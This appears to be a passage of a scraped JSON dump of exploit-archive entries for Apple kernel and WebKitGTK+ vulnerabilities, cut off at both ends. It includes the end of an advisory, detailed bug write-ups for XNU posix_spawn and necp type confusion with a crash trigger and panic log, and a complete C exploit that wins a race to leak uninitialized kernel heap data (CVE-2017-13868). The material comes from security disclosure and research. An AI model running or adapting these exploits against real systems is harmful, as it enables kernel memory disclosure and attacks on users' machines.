Description: Multiple memory corruption\r\n issues were addressed with improved memory handling.\r\n\r\nCVE-2017-7161\r\n Versions affected: WebKitGTK+ before 2.18.6.\r\n Credit to Mitin Svyat.\r\n Impact: Processing maliciously crafted web content may lead to\r\n arbitrary code execution. Description: A command injection issue\r\n existed in Web Inspector. This issue was addressed through improved\r\n escaping of special characters.\r\n\r\nCVE-2017-7165\r\n Versions affected: WebKitGTK+ before 2.18.6.\r\n Credit to 360 Security working with Trend Micro's Zero Day\r\n Initiative.\r\n Impact: Processing maliciously crafted web content may lead to\r\n arbitrary code execution. Description: Multiple memory corruption\r\n issues were addressed with improved memory handling.\r\n\r\nCVE-2017-13884\r\n Versions affected: WebKitGTK+ before 2.18.6.\r\n Credit to 360 Security working with Trend Micro's Zero Day\r\n Initiative.\r\n Impact: Processing maliciously crafted web content may lead to\r\n arbitrary code execution. Description: Multiple memory corruption\r\n issues were addressed with improved memory handling.\r\n\r\nCVE-2017-13885\r\n Versions affected: WebKitGTK+ before 2.18.6.\r\n Credit to 360 Security working with Trend Micro's Zero Day\r\n Initiative.\r\n Impact: Processing maliciously crafted web content may lead to\r\n arbitrary code execution. Description: Multiple memory corruption\r\n issues were addressed with improved memory handling.\r\n\r\n\r\nWe recommend updating to the last stable version of WebKitGTK+. It is\r\nthe best way of ensuring that you are running a safe version of\r\nWebKitGTK+. 
Please check our website for information about the last\r\nstable releases.\r\n\r\nFurther information about WebKitGTK+ Security Advisories can be found\r\nat: https://webkitgtk.org/security.html\r\n\r\nThe WebKitGTK+ team,\r\nJanuary 24, 2018\n\n# 0day.today [2018-04-14] #", "sourceHref": "https://0day.today/exploit/29634", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-02-09T09:08:05", "description": "Exploit for macOS platform in category dos / poc", "cvss3": {}, "published": "2017-12-12T00:00:00", "type": "zdt", "title": "Apple XNU Kernel - Memory Corruption due to Integer Overflow in __offsetof Usage in posix_spawn on 3", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-13876"], "modified": "2017-12-12T00:00:00", "id": "1337DAY-ID-29202", "href": "https://0day.today/exploit/description/29202", "sourceData": "is a pointer to a further arguments descriptor in userspace with the following structure (on 32-bit): \r\n \r\n struct user32__posix_spawn_args_desc { \r\n uint32_t attr_size; /* size of attributes block */ \r\n uint32_t attrp; /* pointer to block */ \r\n uint32_t file_actions_size; /* size of file actions block */ \r\n uint32_t file_actions; /* pointer to block */ \r\n uint32_t port_actions_size; /* size of port actions block */ \r\n uint32_t port_actions; /* pointer to block */ \r\n uint32_t mac_extensions_size; \r\n uint32_t mac_extensions; \r\n uint32_t coal_info_size; \r\n uint32_t coal_info; \r\n uint32_t persona_info_size; \r\n uint32_t persona_info; \r\n } \r\n \r\n port_actions then points to another structure in userspace of this type: \r\n \r\n struct _posix_spawn_port_actions { \r\n int pspa_alloc; \r\n int pspa_count; \r\n _ps_port_action_t pspa_actions[]; \r\n } \r\n \r\n and finally _ps_port_action_t looks like this: \r\n \r\n struct _ps_port_action { \r\n pspa_t port_type; \r\n exception_mask_t mask; \r\n mach_port_name_t new_port; \r\n exception_behavior_t 
behavior; \r\n thread_state_flavor_t flavor; \r\n int which; \r\n } \r\n \r\n Note that pspa_actions is a zero-sized array. pspa_count is supposed to be the number of entries \r\n in this array. \r\n \r\n The following constraints are checked in posix_spawn in kern_exec.c: \r\n \r\n if (px_args.port_actions_size != 0) { \r\n /* Limit port_actions to one page of data */ \r\n if (px_args.port_actions_size < PS_PORT_ACTIONS_SIZE(1) || \r\n px_args.port_actions_size > PAGE_SIZE) { \r\n error = EINVAL; \r\n goto bad; \r\n \r\n \r\n PS_PORT_ACTIONS_SIZE is defined like this: \r\n \r\n #define PS_PORT_ACTIONS_SIZE(x) \\ \r\n __offsetof(struct _posix_spawn_port_actions, pspa_actions[(x)]) \r\n \r\n if port_actions_size passes this then we reach the following code: \r\n \r\n MALLOC(px_spap, _posix_spawn_port_actions_t, \r\n px_args.port_actions_size, M_TEMP, M_WAITOK); \r\n if (px_spap == NULL) { \r\n error = ENOMEM; \r\n goto bad; \r\n } \r\n \r\n imgp->ip_px_spa = px_spap; \r\n \r\n if ((error = copyin(px_args.port_actions, px_spap, \r\n px_args.port_actions_size)) != 0) \r\n goto bad; \r\n \r\n This allocates a kernel heap buffer to hold the port_actions buffer and copies from userspace into it. \r\n \r\n The code then attempts to check whether the pspa_count valid is correct: \r\n \r\n /* Verify that the action count matches the struct size */ \r\n if (PS_PORT_ACTIONS_SIZE(px_spap->pspa_count) != px_args.port_actions_size) { \r\n error = EINVAL; \r\n goto bad; \r\n } \r\n \r\n There is an integer overflow here because offsetof is just simple arithmetic. With a carefully chosen \r\n value for pspa_count we can make it very large but when it's passed to the PS_PORT_ACTIONS_SIZE macro \r\n the result is equal to port_actions_size. Nothing bad has happened yet but we can now get pspa_count \r\n to be much larger than it should be. 
\r\n \r\n Later on we reach the following code: \r\n \r\n if (px_spap->pspa_count != 0 && is_adaptive) { \r\n portwatch_count = px_spap->pspa_count; \r\n MALLOC(portwatch_ports, ipc_port_t *, (sizeof(ipc_port_t) * portwatch_count), M_TEMP, M_WAITOK | M_ZERO); \r\n } else { \r\n portwatch_ports = NULL; \r\n } \r\n \r\n if ((error = exec_handle_port_actions(imgp, &portwatch_present, portwatch_ports)) != 0) \r\n \r\n We can cause another integer overflow here, sizeof(ipc_port_t) is 4 (on 32-bit) so with a carefully chosen value of pspa_count \r\n we can cause the integer overflow here and earlier too whilst still passing the checks. \r\n \r\n exec_handle_port_actions then uses portwatch ports like this: \r\n \r\n for (i = 0; i < pacts->pspa_count; i++) { \r\n act = &pacts->pspa_actions[i]; \r\n \r\n if (MACH_PORT_VALID(act->new_port)) { \r\n kr = ipc_object_copyin(get_task_ipcspace(current_task()), \r\n act->new_port, MACH_MSG_TYPE_COPY_SEND, \r\n (ipc_object_t *) &port); \r\n ... \r\n switch (act->port_type) { \r\n ... \r\n case PSPA_IMP_WATCHPORTS: \r\n if (portwatch_ports != NULL && IPC_PORT_VALID(port)) { \r\n *portwatch_present = TRUE; \r\n /* hold on to this till end of spawn */ \r\n portwatch_ports[i] = port; \r\n \r\n \r\n note that pspa_actions was allocated earlier also based on the result of an integer overflow. \r\n This means we can cause an OOB write to portwatch_ports only if we can successfully read suitable valid \r\n values OOB of pspa_actions. That's why this PoC first fills a kalloc.1024 buffer with suitable values before \r\n freeing it and then hoping that it will get reallocated as pspa_actions (but less than 1024 bytes will be written) \r\n such that we control what's read OOB and the ipc_object_copyin will succeed. \r\n \r\n This seems to be pretty reliable. You can use this to build a nice primitive of a heap overflow with pointers \r\n to ipc_port structures. 
\r\n \r\n I don't believe there are any iOS 11 32-bit iPod/iPhone/iPad/AppleTV devices but the new Apple Watch Series 3 \r\n is running essentially the same kernel but has a 32-bit CPU. This PoC is provided as an Apple watch app \r\n and has been tested on Apple Watch Series 3 (Watch3,2) running WatchOS 4.0.1. I also tested on an older 32-bit iOS 9 device. \r\n \r\n Apple Watch Series 3 now has its own LTE modem and can be used without an iPhone making it a suitably interesting target for exploitation \r\n by itself. \r\n \r\n Note that all the uses of offsetof in those posix_spawn macros are quite wrong, I think you might be able to get \r\n a kernel memory disclosure with one of them also on 64-bit platforms. The fix is to add correct bounds checking. \r\n \r\n Please also note that this really shouldn't be attack surface reachable from an app sandbox. The MAC hook in posix_spawn \r\n is very late and there's a *lot* of code which you can hit before it. \r\n \r\n \r\n Proof of Concept: \r\n https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/43325.zip\n\n# 0day.today [2018-02-09] #", "sourceHref": "https://0day.today/exploit/29202", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-02-16T09:17:58", "description": "Exploit for macOS platform in category dos / poc", "cvss3": {}, "published": "2017-12-12T00:00:00", "type": "zdt", "title": "macOS necp_get_socket_attributes so_pcb Type Confusion Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-13855"], "modified": "2017-12-12T00:00:00", "id": "1337DAY-ID-29198", "href": "https://0day.today/exploit/description/29198", "sourceData": "MacOS so_pcb type confusion in necp_get_socket_attributes \r\n\r\nCVE-2017-13855\r\n\r\n\r\nWhen setsockopt() is called on any socket with level SOL_SOCKET and optname SO_NECP_ATTRIBUTES, necp_get_socket_attributes is invoked.\r\nnecp_get_socket_attributes() 
unconditionally calls sotoinpcb(so):\r\n\r\n errno_t\r\n necp_get_socket_attributes(struct socket *so, struct sockopt *sopt)\r\n {\r\n int error = 0;\r\n u_int8_t *buffer = NULL;\r\n u_int8_t *cursor = NULL;\r\n size_t valsize = 0;\r\n struct inpcb *inp = sotoinpcb(so);\r\n\r\n if (inp->inp_necp_attributes.inp_domain != NULL) {\r\n valsize += sizeof(struct necp_tlv_header) + strlen(inp->inp_necp_attributes.inp_domain);\r\n }\r\n [...]\r\n }\r\n\r\nsotoinpcb() causes type confusion if so->so_pcb is of an unexpected type (because the socket is not an IPv4/IPv6 socket):\r\n\r\n #define sotoinpcb(so) ((struct inpcb *)(so)->so_pcb)\r\n\r\nIf necp_get_socket_attributes() is called on a UNIX domain socket, this will cause the members of inp->inp_necp_attributes to be read from type-confused, probably also out-of-bounds memory behind the actual so->so_pcb (which is of type `struct unpcb`, which looks much smaller than `struct inpcb`).\r\n\r\n\r\nTo trigger this bug, compile the following code, run it, and cause some system activity, e.g. 
by launching the browser (the PoC won't crash if so->so_pcb contains NULLs in the right spots).\r\n\r\n==============\r\n#include <sys/types.h>\r\n#include <sys/un.h>\r\n#include <sys/socket.h>\r\n#include <err.h>\r\n#include <unistd.h>\r\n\r\n#define SO_NECP_ATTRIBUTES 0x1109\r\n\r\nint main(void) {\r\n while (1) {\r\n int s = socket(AF_UNIX, SOCK_STREAM, 0);\r\n if (s == -1)\r\n err(1, \"socket\");\r\n getsockopt(s, SOL_SOCKET, SO_NECP_ATTRIBUTES, NULL, NULL);\r\n close(s);\r\n }\r\n}\r\n==============\r\n\r\nOn macOS 10.13 (17A405), this causes the following crash:\r\n\r\n==============\r\n*** Panic Report ***\r\npanic(cpu 2 caller 0xffffff800e78a611): Kernel trap at 0xffffff800e976930, type 14=page fault, registers:\r\nCR0: 0x000000008001003b, CR2: 0x000000fa000000cc, CR3: 0x0000000200037073, CR4: 0x00000000001627e0\r\nRAX: 0x000000fa000000cc, RBX: 0x000000fa000000cb, RCX: 0xffffff800eb90aad, RDX: 0xffffff800eb90dcc\r\nRSP: 0xffffff8018de3e70, RBP: 0xffffff8018de3e90, RSI: 0xffffff8018de3ef0, RDI: 0xffffff8032ac66a8\r\nR8: 0x0000000000000001, R9: 0xffffffff00000000, R10: 0x0000000000000000, R11: 0x0000000000000246\r\nR12: 0xffffff80357cf7d0, R13: 0xffffff8032d69a08, R14: 0xffffff8018de3ef0, R15: 0xffffff8032ac66a8\r\nRFL: 0x0000000000010206, RIP: 0xffffff800e976930, CS: 0x0000000000000008, SS: 0x0000000000000010\r\nFault CR2: 0x000000fa000000cc, Error code: 
0x0000000000000000, Fault CPU: 0x2, PL: 0, VF: 1\r\n==============\r\n\r\nThis bug should be usable for disclosing kernel memory.\r\n\r\nThis bug is subject to a 90 day disclosure deadline. After 90 days elapse\r\nor a patch has been made broadly available, the bug report will become\r\nvisible to the public.\r\n\r\n\r\n\r\nFound by: jannh\n\n# 0day.today [2018-02-16] #", "sourceHref": "https://0day.today/exploit/29198", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-03-06T22:08:06", "description": "Exploit for macOS platform in category local exploits", "cvss3": {}, "published": "2018-03-03T00:00:00", "type": "zdt", "title": "Apple macOS HighSierra 10.13 - ctl_ctloutput-leak Information Leak Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-13868"], "modified": "2018-03-03T00:00:00", "id": "1337DAY-ID-29935", "href": "https://0day.today/exploit/description/29935", "sourceData": "/*\r\n * ctl_ctloutput-leak.c\r\n * Brandon Azad\r\n *\r\n * CVE-2017-13868\r\n *\r\n * While looking through the source code of XNU version 4570.1.46, I noticed that the function\r\n * ctl_ctloutput() in the file bsd/kern/kern_control.c does not check the return value of\r\n * sooptcopyin(), which makes it possible to leak the uninitialized contents of a kernel heap\r\n * allocation to user space. Triggering this information leak requires root privileges.\r\n *\r\n * The ctl_ctloutput() function is called when a userspace program calls getsockopt(2) on a kernel\r\n * control socket. The relevant code does the following:\r\n * (a) It allocates a kernel heap buffer for the data parameter to getsockopt(), without\r\n * specifying the M_ZERO flag to zero out the allocated bytes.\r\n * (b) It copies in the getsockopt() data from userspace using sooptcopyin(), filling the data\r\n * buffer just allocated. 
This copyin is supposed to completely overwrite the allocated data,\r\n * which is why the M_ZERO flag was not needed. However, the return value of sooptcopyin() is\r\n * not checked, which means it is possible that the copyin has failed, leaving uninitialized\r\n * data in the buffer. The copyin could fail if, for example, the program passed an unmapped\r\n * address to getsockopt().\r\n * (c) The code then calls the real getsockopt() implementation for this kernel control socket.\r\n * This implementation should process the input buffer, possibly modifying it and shortening\r\n * it, and return a result code. However, the implementation is free to assume that the\r\n * supplied buffer has already been initialized (since theoretically it comes from user\r\n * space), and hence several implementations don't modify the buffer at all. The NECP\r\n * function necp_ctl_getopt(), for example, just returns 0 without processing the data buffer\r\n * at all.\r\n * (d) Finally, if the real getsockopt() implementation doesn't return an error, ctl_ctloutput()\r\n * calls sooptcopyout() to copy the data buffer back to user space.\r\n *\r\n * Thus, by specifying an unmapped data address to getsockopt(2), we can cause a heap buffer of a\r\n * controlled size to be allocated, prevent the contents of that buffer from being initialized, and\r\n * then reach a call to sooptcopyout() that tries to write that buffer back to the unmapped\r\n * address. All we need to do for the copyout to succeed is remap that address between the calls to\r\n * sooptcopyin() and sooptcopyout(). If we can do that, then we will leak uninitialized kernel heap\r\n * data to userspace.\r\n *\r\n * It turns out that this is a pretty easy race to win. While testing on my 2015 Macbook Pro, the\r\n * mean number of attempts to win the race was never more than 600, and the median was never more\r\n * than 5. 
(This testing was conducted with DEBUG off, since the printfs dramatically slow down the\r\n * exploit.)\r\n *\r\n * This program exploits this vulnerability to leak data from a kernel heap buffer of a\r\n * user-specified size. No attempt is made to seed the heap with interesting data. Tested on macOS\r\n * High Sierra 10.13 (build 17A365).\r\n *\r\n * Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44234.zip\r\n *\r\n */\r\n#if 0\r\n if (sopt->sopt_valsize && sopt->sopt_val) {\r\n MALLOC(data, void *, sopt->sopt_valsize, M_TEMP, // (a) data is allocated\r\n M_WAITOK); // without M_ZERO.\r\n if (data == NULL)\r\n return (ENOMEM);\r\n /*\r\n * 4108337 - copy user data in case the\r\n * kernel control needs it\r\n */\r\n error = sooptcopyin(sopt, data, // (b) sooptcopyin() is\r\n sopt->sopt_valsize, sopt->sopt_valsize); // called to fill the\r\n } // buffer; the return\r\n len = sopt->sopt_valsize; // value is ignored.\r\n socket_unlock(so, 0);\r\n error = (*kctl->getopt)(kctl->kctlref, kcb->unit, // (c) The getsockopt()\r\n kcb->userdata, sopt->sopt_name, // implementation is\r\n data, &len); // called to process\r\n if (data != NULL && len > sopt->sopt_valsize) // the buffer.\r\n panic_plain(\"ctl_ctloutput: ctl %s returned \"\r\n \"len (%lu) > sopt_valsize (%lu)\\n\",\r\n kcb->kctl->name, len,\r\n sopt->sopt_valsize);\r\n socket_lock(so, 0);\r\n if (error == 0) {\r\n if (data != NULL)\r\n error = sooptcopyout(sopt, data, len); // (d) If (c) succeeded,\r\n else // then the data buffer\r\n sopt->sopt_valsize = len; // is copied out to\r\n } // userspace.\r\n#endif\r\n \r\n#include <errno.h>\r\n#include <mach/mach.h>\r\n#include <netinet/in.h>\r\n#include <pthread.h>\r\n#include <stdbool.h>\r\n#include <stdint.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <sys/ioctl.h>\r\n#include <unistd.h>\r\n \r\n#if __x86_64__\r\n \r\n// ---- Header files not available on iOS 
---------------------------------------------------------\r\n \r\n#include <mach/mach_vm.h>\r\n#include <sys/sys_domain.h>\r\n#include <sys/kern_control.h>\r\n \r\n#else /* __x86_64__ */\r\n \r\n// If we're not on x86_64, then we probably don't have access to the above headers. The following\r\n// definitions are copied directly from the macOS header files.\r\n \r\n// ---- Definitions from mach/mach_vm.h -----------------------------------------------------------\r\n \r\nextern\r\nkern_return_t mach_vm_allocate\r\n(\r\n vm_map_t target,\r\n mach_vm_address_t *address,\r\n mach_vm_size_t size,\r\n int flags\r\n);\r\n \r\nextern\r\nkern_return_t mach_vm_deallocate\r\n(\r\n vm_map_t target,\r\n mach_vm_address_t address,\r\n mach_vm_size_t size\r\n);\r\n \r\n// ---- Definitions from sys/sys_domain.h ---------------------------------------------------------\r\n \r\n#define SYSPROTO_CONTROL 2 /* kernel control protocol */\r\n \r\n#define AF_SYS_CONTROL 2 /* corresponding sub address type */\r\n \r\n// ---- Definitions from sys/kern_control.h -------------------------------------------------------\r\n \r\n#define CTLIOCGINFO _IOWR('N', 3, struct ctl_info) /* get id from name */\r\n \r\n#define MAX_KCTL_NAME 96\r\n \r\nstruct ctl_info {\r\n u_int32_t ctl_id; /* Kernel Controller ID */\r\n char ctl_name[MAX_KCTL_NAME]; /* Kernel Controller Name (a C string) */\r\n};\r\n \r\nstruct sockaddr_ctl {\r\n u_char sc_len; /* depends on size of bundle ID string */\r\n u_char sc_family; /* AF_SYSTEM */\r\n u_int16_t ss_sysaddr; /* AF_SYS_KERNCONTROL */\r\n u_int32_t sc_id; /* Controller unique identifier */\r\n u_int32_t sc_unit; /* Developer private unit number */\r\n u_int32_t sc_reserved[5];\r\n};\r\n \r\n#endif /* __x86_64__ */\r\n \r\n// ---- Definitions from bsd/net/necp.h -----------------------------------------------------------\r\n \r\n#define NECP_CONTROL_NAME \"com.apple.net.necp_control\"\r\n \r\n// ---- Macros 
------------------------------------------------------------------------------------\r\n \r\n#if DEBUG\r\n#define DEBUG_TRACE(fmt, ...) printf(fmt\"\\n\", ##__VA_ARGS__)\r\n#else\r\n#define DEBUG_TRACE(fmt, ...)\r\n#endif\r\n \r\n#define ERROR(fmt, ...) printf(\"Error: \"fmt\"\\n\", ##__VA_ARGS__)\r\n \r\n// ---- Kernel heap infoleak ----------------------------------------------------------------------\r\n \r\n// A callback block that will be called each time kernel data is leaked. leak_data and leak_size\r\n// are the kernel data that was leaked and the size of the leak. This function should return true\r\n// to finish and clean up, false to retry the leak.\r\ntypedef bool (^kernel_leak_callback_block)(const void *leak_data, size_t leak_size);\r\n \r\n// Open the control socket for com.apple.necp. Requires root privileges.\r\nstatic bool open_necp_control_socket(int *necp_ctlfd) {\r\n int ctlfd = socket(PF_SYSTEM, SOCK_DGRAM, SYSPROTO_CONTROL);\r\n if (ctlfd < 0) {\r\n ERROR(\"Could not create a system control socket: errno %d\", errno);\r\n return false;\r\n }\r\n struct ctl_info ctlinfo = { .ctl_id = 0 };\r\n strncpy(ctlinfo.ctl_name, NECP_CONTROL_NAME, sizeof(ctlinfo.ctl_name));\r\n int err = ioctl(ctlfd, CTLIOCGINFO, &ctlinfo);\r\n if (err) {\r\n close(ctlfd);\r\n ERROR(\"Could not retrieve the control ID number for %s: errno %d\",\r\n NECP_CONTROL_NAME, errno);\r\n return false;\r\n }\r\n struct sockaddr_ctl addr = {\r\n .sc_len = sizeof(addr),\r\n .sc_family = AF_SYSTEM,\r\n .ss_sysaddr = AF_SYS_CONTROL,\r\n .sc_id = ctlinfo.ctl_id, // com.apple.necp\r\n .sc_unit = 0, // Let the kernel pick the control unit.\r\n };\r\n err = connect(ctlfd, (struct sockaddr *)&addr, sizeof(addr));\r\n if (err) {\r\n close(ctlfd);\r\n ERROR(\"Could not connect to the NECP control system (ID %d) \"\r\n \"unit %d: errno %d\", addr.sc_id, addr.sc_unit, errno);\r\n return false;\r\n }\r\n *necp_ctlfd = ctlfd;\r\n return true;\r\n}\r\n \r\n// Allocate a virtual memory region at 
the address pointed to by map_address. If map_address points\r\n// to a NULL address, then the allocation is created at an arbitrary address which is stored in\r\n// map_address on return.\r\nstatic bool allocate_map_address(void **map_address, size_t map_size) {\r\n mach_vm_address_t address = (mach_vm_address_t) *map_address;\r\n bool get_address = (address == 0);\r\n int flags = (get_address ? VM_FLAGS_ANYWHERE : VM_FLAGS_FIXED);\r\n kern_return_t kr = mach_vm_allocate(mach_task_self(), &address, map_size, flags);\r\n if (kr != KERN_SUCCESS) {\r\n ERROR(\"Could not allocate virtual memory: mach_vm_allocate %d: %s\",\r\n kr, mach_error_string(kr));\r\n return false;\r\n }\r\n if (get_address) {\r\n *map_address = (void *)address;\r\n }\r\n return true;\r\n}\r\n \r\n// Deallocate the mapping created by allocate_map_address.\r\nstatic void deallocate_map_address(void *map_address, size_t map_size) {\r\n mach_vm_deallocate(mach_task_self(), (mach_vm_address_t) map_address, map_size);\r\n}\r\n \r\n// Context for the map_address_racer thread.\r\nstruct map_address_racer_context {\r\n pthread_t thread;\r\n volatile bool running;\r\n volatile bool deallocated;\r\n volatile bool do_map;\r\n volatile bool restart;\r\n bool success;\r\n void * address;\r\n size_t size;\r\n};\r\n \r\n// The racer thread. This thread will repeatedly: (a) deallocate the address; (b) spin until do_map\r\n// is true; (c) allocate the address; (d) spin until the main thread sets restart to true or\r\n// running to false. 
If the thread encounters an internal error, it sets success to false and\r\n// exits.\r\nstatic void *map_address_racer(void *arg) {\r\n struct map_address_racer_context *context = arg;\r\n while (context->running) {\r\n // Deallocate the address.\r\n deallocate_map_address(context->address, context->size);\r\n context->deallocated = true;\r\n // Wait for do_map to become true.\r\n while (!context->do_map) {}\r\n context->do_map = false;\r\n // Do a little bit of work so that the allocation is more likely to take place at\r\n // the right time.\r\n close(-1);\r\n // Re-allocate the address. If this fails, abort.\r\n bool success = allocate_map_address(&context->address, context->size);\r\n if (!success) {\r\n context->success = false;\r\n break;\r\n }\r\n // Wait while we're still running and not told to restart.\r\n while (context->running && !context->restart) {}\r\n context->restart = false;\r\n };\r\n return NULL;\r\n}\r\n \r\n// Start the map_address_racer thread.\r\nstatic bool start_map_address_racer(struct map_address_racer_context *context, size_t leak_size) {\r\n // Allocate the initial block of memory, fixing the address.\r\n context->address = NULL;\r\n context->size = leak_size;\r\n if (!allocate_map_address(&context->address, context->size)) {\r\n goto fail_0;\r\n }\r\n // Start the racer thread.\r\n context->running = true;\r\n context->deallocated = false;\r\n context->do_map = false;\r\n context->restart = false;\r\n context->success = true;\r\n int err = pthread_create(&context->thread, NULL, map_address_racer, context);\r\n if (err) {\r\n ERROR(\"Could not create map_address_racer thread: errno %d\", err);\r\n goto fail_1;\r\n }\r\n return true;\r\nfail_1:\r\n deallocate_map_address(context->address, context->size);\r\nfail_0:\r\n return false;\r\n}\r\n \r\n// Stop the map_address_racer thread.\r\nstatic void stop_map_address_racer(struct map_address_racer_context *context) {\r\n // Exit the thread.\r\n context->running = false;\r\n 
context->do_map = true;\r\n pthread_join(context->thread, NULL);\r\n // Deallocate the memory.\r\n deallocate_map_address(context->address, context->size);\r\n}\r\n \r\n// Try the NECP leak once. Returns true if the leak succeeded.\r\nstatic bool try_necp_leak(int ctlfd, struct map_address_racer_context *context) {\r\n socklen_t length = context->size;\r\n // Wait for the map to be deallocated.\r\n while (!context->deallocated) {};\r\n context->deallocated = false;\r\n // Signal the racer to do the mapping.\r\n context->do_map = true;\r\n // Try to trigger the leak.\r\n int err = getsockopt(ctlfd, SYSPROTO_CONTROL, 0, context->address, &length);\r\n if (err) {\r\n DEBUG_TRACE(\"Did not allocate in time\");\r\n return false;\r\n }\r\n // Most of the time we end up here: allocating too early. If the first two words are both\r\n // 0, then assume we didn't make the leak. We need the leak size to be at least 16 bytes.\r\n uint64_t *data = context->address;\r\n if (data[0] == 0 && data[1] == 0) {\r\n return false;\r\n }\r\n // WOW! It worked!\r\n return true;\r\n}\r\n \r\n// Repeatedly try the NECP leak, until either we succeed or hit the maximum retry limit.\r\nstatic bool try_necp_leak_repeat(int ctlfd, kernel_leak_callback_block kernel_leak_callback,\r\n struct map_address_racer_context *context) {\r\n const size_t MAX_TRIES = 10000000;\r\n bool has_leaked = false;\r\n for (size_t try = 1;; try++) {\r\n // Try the leak once.\r\n if (try_necp_leak(ctlfd, context)) {\r\n DEBUG_TRACE(\"Triggered the leak after %zu %s!\", try,\r\n (try == 1 ? 
\"try\" : \"tries\"));\r\n try = 0;\r\n has_leaked = true;\r\n // Give the leak to the callback, and finish if it says we're done.\r\n if (kernel_leak_callback(context->address, context->size)) {\r\n return true;\r\n }\r\n }\r\n // If we haven't successfully leaked anything after MAX_TRIES attempts, give up.\r\n if (!has_leaked && try >= MAX_TRIES) {\r\n ERROR(\"Giving up after %zu unsuccessful leak attempts\", try);\r\n return false;\r\n }\r\n // Reset for another try.\r\n context->restart = true;\r\n }\r\n}\r\n \r\n// Leak kernel heap data repeatedly until the callback function returns true.\r\nstatic bool leak_kernel_heap(size_t leak_size, kernel_leak_callback_block kernel_leak_callback) {\r\n const size_t MIN_LEAK_SIZE = 16;\r\n bool success = false;\r\n if (leak_size < MIN_LEAK_SIZE) {\r\n ERROR(\"Target leak size too small; must be at least %zu bytes\", MIN_LEAK_SIZE);\r\n goto fail_0;\r\n }\r\n int ctlfd;\r\n if (!open_necp_control_socket(&ctlfd)) {\r\n goto fail_0;\r\n }\r\n struct map_address_racer_context context;\r\n if (!start_map_address_racer(&context, leak_size)) {\r\n goto fail_1;\r\n }\r\n if (!try_necp_leak_repeat(ctlfd, kernel_leak_callback, &context)) {\r\n goto fail_2;\r\n }\r\n success = true;\r\nfail_2:\r\n stop_map_address_racer(&context);\r\nfail_1:\r\n close(ctlfd);\r\nfail_0:\r\n return success;\r\n}\r\n \r\n// ---- Main --------------------------------------------------------------------------------------\r\n \r\n// Dump data to stdout.\r\nstatic void dump(const void *data, size_t size) {\r\n const uint8_t *p = data;\r\n const uint8_t *end = p + size;\r\n unsigned off = 0;\r\n while (p < end) {\r\n printf(\"%06x: %02x\", off & 0xffffff, *p++);\r\n for (unsigned i = 1; i < 16 && p < end; i++) {\r\n bool space = (i % 8) == 0;\r\n printf(\" %s%02x\", (space ? 
\" \" : \"\"), *p++);\r\n }\r\n printf(\"\\n\");\r\n off += 16;\r\n }\r\n}\r\n \r\nint main(int argc, const char *argv[]) {\r\n // Parse the arguments.\r\n if (argc != 2) {\r\n ERROR(\"Usage: %s <leak-size>\", argv[0]);\r\n return 1;\r\n }\r\n char *end;\r\n size_t leak_size = strtoul(argv[1], &end, 0);\r\n if (*end != 0) {\r\n ERROR(\"Invalid leak size '%s'\", argv[1]);\r\n return 1;\r\n }\r\n // Try to leak interesting data from the kernel.\r\n const size_t MAX_TRIES = 50000;\r\n __block size_t try = 1;\r\n __block bool leaked = false;\r\n bool success = leak_kernel_heap(leak_size, ^bool (const void *leak, size_t size) {\r\n // Try to find an kernel pointer in the leak.\r\n const uint64_t *p = leak;\r\n for (size_t i = 0; i < size / sizeof(*p); i++) {\r\n if (p[i] >> 48 == 0xffff) {\r\n dump(leak, size);\r\n leaked = true;\r\n return true;\r\n }\r\n }\r\n#if DEBUG\r\n // Show this useless leak anyway.\r\n DEBUG_TRACE(\"Boring leak:\");\r\n dump(leak, size);\r\n#endif\r\n // If we've maxed out, just bail.\r\n if (try >= MAX_TRIES) {\r\n ERROR(\"Could not leak interesting data after %zu attempts\", try);\r\n return true;\r\n }\r\n try++;\r\n return false;\r\n });\r\n return (success && leaked ? 
0 : 1);\r\n}\n\n# 0day.today [2018-03-06] #", "sourceHref": "https://0day.today/exploit/29935", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-04-14T15:50:10", "description": "Exploit for macOS platform in category dos / poc", "cvss3": {}, "published": "2017-12-12T00:00:00", "type": "zdt", "title": "macOS getrusage Stack Leak Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-13869"], "modified": "2017-12-12T00:00:00", "id": "1337DAY-ID-29199", "href": "https://0day.today/exploit/description/29199", "sourceData": "MacOS getrusage stack leak through struct padding \r\n\r\nCVE-2017-13869\r\n\r\n\r\nFor 64-bit processes, the getrusage() syscall handler converts a `struct rusage` to a `struct user64_rusage` using `munge_user64_rusage()`, then copies the `struct user64_rusage` to userspace:\r\n\r\nint\r\ngetrusage(struct proc *p, struct getrusage_args *uap, __unused int32_t *retval)\r\n{\r\n struct rusage *rup, rubuf;\r\n struct user64_rusage rubuf64;\r\n struct user32_rusage rubuf32;\r\n size_t retsize = sizeof(rubuf); /* default: 32 bits */\r\n caddr_t retbuf = (caddr_t)&rubuf; /* default: 32 bits */\r\n struct timeval utime;\r\n struct timeval stime;\r\n\r\n\r\n switch (uap->who) {\r\n case RUSAGE_SELF:\r\n calcru(p, &utime, &stime, NULL);\r\n proc_lock(p);\r\n rup = &p->p_stats->p_ru;\r\n rup->ru_utime = utime;\r\n rup->ru_stime = stime;\r\n\r\n rubuf = *rup;\r\n proc_unlock(p);\r\n\r\n break;\r\n [...]\r\n }\r\n if (IS_64BIT_PROCESS(p)) {\r\n retsize = sizeof(rubuf64);\r\n retbuf = (caddr_t)&rubuf64;\r\n munge_user64_rusage(&rubuf, &rubuf64);\r\n } else {\r\n [...]\r\n }\r\n\r\n return (copyout(retbuf, uap->rusage, 